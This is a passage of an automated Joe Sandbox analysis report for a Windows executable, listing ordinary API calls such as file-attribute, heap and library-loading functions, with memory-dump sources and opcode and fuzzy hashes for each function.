                                                                                                                                            • SetFileAttributesW.KERNELBASE(?,00007FF6EF6BD782,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BDB93
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00007FF6EF6BD782,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BDBC0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 9922b51953f326bddede81da838ac517d88a3aa880a3b7e29d323bb0935ea4de
                                                                                                                                            • Instruction ID: f435b404438213211bcf4b80223c8c64f543fae9276549fc2cddca11ab1041a5
                                                                                                                                            • Opcode Fuzzy Hash: 9922b51953f326bddede81da838ac517d88a3aa880a3b7e29d323bb0935ea4de
                                                                                                                                            • Instruction Fuzzy Hash: 04017123B18A8243E660DB11A44039923ACBB89BC0F544131ED8DC7759DF3ED6869B09
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemRectTextWindow$Clientswprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3322643685-0
                                                                                                                                            • Opcode ID: 56b4ef3a8ca9051483f4fde00dc832cb4ef6496f92d169b50556cc8b670c4359
                                                                                                                                            • Instruction ID: 95c50f1d0bd0c1400b40222eef5e07e1bcefdb40163949553dbbf16061825f07
                                                                                                                                            • Opcode Fuzzy Hash: 56b4ef3a8ca9051483f4fde00dc832cb4ef6496f92d169b50556cc8b670c4359
                                                                                                                                            • Instruction Fuzzy Hash: 3A01BC26E0C28613FE094B52B4143B913A5AF85740F084431ED4D87299DFBEE184D30A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                            • Opcode ID: 14817deb9e469959f4c519e694afdcff73abcf349b9dcd90aa63010e06c77982
                                                                                                                                            • Instruction ID: f3789c0700a4da27fb2fc2b39e6260425b60401a556afb9feb7c0152cfb9e075
                                                                                                                                            • Opcode Fuzzy Hash: 14817deb9e469959f4c519e694afdcff73abcf349b9dcd90aa63010e06c77982
                                                                                                                                            • Instruction Fuzzy Hash: ADF0AF23B1868243E6609F21E9103EA635CBF49BC4F800031E9CDC7699DF2EE2849B09
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00007FF6EF6BD746,00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD4C8
                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00007FF6EF6BD746,00000001,00000001,?,00007FF6EF6BD343,00000001,?,?,00007FF6EF6B91EB), ref: 00007FF6EF6BD4F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: ac0b94f312213f30e4f1ffecd14a14af6a49e72a4523b7e70f9c6c714eb6493f
                                                                                                                                            • Instruction ID: fca7fc2732c636d6803e40dc9c6735d643935911f62651018de3c1e26bb222ec
                                                                                                                                            • Opcode Fuzzy Hash: ac0b94f312213f30e4f1ffecd14a14af6a49e72a4523b7e70f9c6c714eb6493f
                                                                                                                                            • Instruction Fuzzy Hash: 8CF0AF23B1868143E660AB64E8503A963A8BB4C7D4F400531EA9CC7799DF7EE6849B05
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1175261203-0
                                                                                                                                            • Opcode ID: 3eea30f6c570d66af2bbf58731e05050acf4960456867659ee8e440163dd4e16
                                                                                                                                            • Instruction ID: cc05c05c852264ce1e9402b6089891df650fda3efca418ede03a1b503db941b7
                                                                                                                                            • Opcode Fuzzy Hash: 3eea30f6c570d66af2bbf58731e05050acf4960456867659ee8e440163dd4e16
                                                                                                                                            • Instruction Fuzzy Hash: B6F09623B1858193FB70AB10E8113EA6368BF8C784F400031F9CDC7659DE2DE245DB45
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6EF6C5A99,?,?,?,?,?,?,?,?,00007FF6EF6BEFCE), ref: 00007FF6EF6C5A48
                                                                                                                                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF6EF6C5A5B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1231390398-0
                                                                                                                                            • Opcode ID: 2ea2a73d1e5f90ccb45dbe3b28c4e81f4deac0d6f0f8a6f3c57ebbd5e1b152f1
                                                                                                                                            • Instruction ID: 093501e4b641b7a5fcb398e6492031dd52fea4285805c007e8381d3c3bc1d305
                                                                                                                                            • Opcode Fuzzy Hash: 2ea2a73d1e5f90ccb45dbe3b28c4e81f4deac0d6f0f8a6f3c57ebbd5e1b152f1
                                                                                                                                            • Instruction Fuzzy Hash: 09E02B63F1468287DF088F9AC8405E97395EFC4B40B848136D50EC3614EE2EE6498701
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1173176844-0
                                                                                                                                            • Opcode ID: 0e739d31772a395dab13472248fdbade556b136d12e7837296ebec5d68a17119
                                                                                                                                            • Instruction ID: 40f5f3e670cd7383ad0e9fa1ad7ed23e9007cecfd96c430bfe3c3c5df2b0a66d
                                                                                                                                            • Opcode Fuzzy Hash: 0e739d31772a395dab13472248fdbade556b136d12e7837296ebec5d68a17119
                                                                                                                                            • Instruction Fuzzy Hash: 1FE0B652E1910743F96832A218153B4034C0F58774F6C1B30E93E892D7ED1FA4966B2A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                            • Opcode ID: e3635b7cea3a3b50ac01d0ebb9d073b96dd5648f5856d7e6baa1fb7098396ee9
                                                                                                                                            • Instruction ID: e20f6f3adc96cf76fcbe4b3807eb7c8217fd069ee72bae045e04b8d1fbf00d58
                                                                                                                                            • Opcode Fuzzy Hash: e3635b7cea3a3b50ac01d0ebb9d073b96dd5648f5856d7e6baa1fb7098396ee9
                                                                                                                                            • Instruction Fuzzy Hash: 3CE08C67F0910383FF08ABB2AC0537823B96F44B84B048034C81DC6291EE2EB681A34B
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Alloc__vcrt___vcrt_uninitialize_ptd
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3765095794-0
                                                                                                                                            • Opcode ID: 6b5ec4c6cd7f0baa5d3f7175a74b30a0589591f587f1918e98c5ab1e0d2ef736
                                                                                                                                            • Instruction ID: 80af442c33eba9d585ef3f60e35e65af6312f2dc5401920c6bfa79ac65de9da4
                                                                                                                                            • Opcode Fuzzy Hash: 6b5ec4c6cd7f0baa5d3f7175a74b30a0589591f587f1918e98c5ab1e0d2ef736
                                                                                                                                            • Instruction Fuzzy Hash: B0E01266D0C64397FA507F34984527413582F41350F700631D01DC66E6EF2FA456BF0E
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1284135714-0
                                                                                                                                            • Opcode ID: 93782bb743bf98bc08d0833e6c61ecd22693001662f042d55035a30427c11cef
                                                                                                                                            • Instruction ID: 52f5aa63743357a5639e2ccab031957bdf1c45b06c554471ffd17043acf1b992
                                                                                                                                            • Opcode Fuzzy Hash: 93782bb743bf98bc08d0833e6c61ecd22693001662f042d55035a30427c11cef
                                                                                                                                            • Instruction Fuzzy Hash: 3E219A6791D58797FA00AB24F8613A43768AF54340F401032E48DC62AAEE3FE62DD70A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                            • Opcode ID: a28b435e1cb4af45411b9b6ddea98d7579c3164ea4b21b5d1857de89c8c0bbda
                                                                                                                                            • Instruction ID: c028c5d6d4408a17dc9b61beeb03afc3677d5cee4f7f0a0e38966dc8ca695203
                                                                                                                                            • Opcode Fuzzy Hash: a28b435e1cb4af45411b9b6ddea98d7579c3164ea4b21b5d1857de89c8c0bbda
                                                                                                                                            • Instruction Fuzzy Hash: F541BD23A1960393FF649B11AC503392369BFE0B80F105035D90DC7691EF7FEA41A30A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompareCurrentDirectoryFileOperationString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3543741193-0
                                                                                                                                            • Opcode ID: 1a13422cf893634dff6018976258695094e37760d6f8a7e2a768e783f6d26740
                                                                                                                                            • Instruction ID: c4d3dab19f94ff9613691ab9dd512b2824f4b0346b345019b6eb0146a7a2de39
                                                                                                                                            • Opcode Fuzzy Hash: 1a13422cf893634dff6018976258695094e37760d6f8a7e2a768e783f6d26740
                                                                                                                                            • Instruction Fuzzy Hash: FC216027A1864683FA20EB61E4513AA6368FF84344F900431E58DC76A6EF7FF145DB0A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                            • Opcode ID: 6af88fc6ebfe8f99a723ca692a47c83e6077e8e003402135c64b1b096b41092a
                                                                                                                                            • Instruction ID: 397695de25a9e76c67f42a002c8eea1913af69cb3662f57fb4d0a6c5a76c2d18
                                                                                                                                            • Opcode Fuzzy Hash: 6af88fc6ebfe8f99a723ca692a47c83e6077e8e003402135c64b1b096b41092a
                                                                                                                                            • Instruction Fuzzy Hash: 8A114C37A1C642C7FA109F10A84177967A9FB40384F550535E68EC7691DF3EEA30A71A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                            • Opcode ID: 6fe7383ab83a134d2ad18e3cddc5ab59d7a07864f2eeddf8e09232de20e9074a
                                                                                                                                            • Instruction ID: 4326997781c7bfd54fa2bb4e5210fbffc4ab996c5c46875e6ad2a099b21b9379
                                                                                                                                            • Opcode Fuzzy Hash: 6fe7383ab83a134d2ad18e3cddc5ab59d7a07864f2eeddf8e09232de20e9074a
                                                                                                                                            • Instruction Fuzzy Hash: D9017143B0C24283FD645B666E543B923789F49BD0F146231D82DC72C6ED2EA740B20B
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00007FF6EF6D5ED8: GetModuleHandleW.KERNEL32(?,?,?,00007FF6EF6D5E47,?,?,?,00007FF6EF6D61FA), ref: 00007FF6EF6D5EFF
                                                                                                                                            • DloadProtectSection.DELAYIMP ref: 00007FF6EF6D5E9D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DloadHandleModuleProtectSection
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2883838935-0
